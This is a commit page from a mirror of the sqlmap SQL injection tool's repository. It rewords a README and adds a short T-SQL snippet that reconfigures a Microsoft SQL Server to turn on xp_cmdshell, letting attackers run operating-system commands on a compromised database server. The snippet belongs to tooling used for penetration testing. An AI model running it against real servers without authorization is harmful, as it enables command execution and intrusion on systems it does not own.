mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2026-08-27 04:05:58 +00:00
adding first code example for SPL snippets
This commit is contained in:
parent
edeb4b6113
commit
9059d30312
4 changed files with 23 additions and 7 deletions
|
|
@ -1,3 +1,3 @@
|
|||
Files in this folder represent SQL stored procedure declarations used
|
||||
Files in this folder represent SQL Procedural Language snippets used
|
||||
by sqlmap on the target system. They are licensed under the terms of
|
||||
the GNU Lesser General Public License.
|
||||
|
|
|
|||
6
procs/configure_xp_cmdshell.txt
Normal file
6
procs/configure_xp_cmdshell.txt
Normal file
|
|
@ -0,0 +1,6 @@
|
|||
EXEC master..sp_configure 'show advanced options', 1;
|
||||
RECONFIGURE WITH OVERRIDE;
|
||||
EXEC master..sp_configure 'xp_cmdshell', %ENABLE%;
|
||||
RECONFIGURE WITH OVERRIDE;
|
||||
EXEC sp_configure 'show advanced options', 0;
|
||||
RECONFIGURE WITH OVERRIDE;
|
||||
Loading…
Add table
Add a link
Reference in a new issue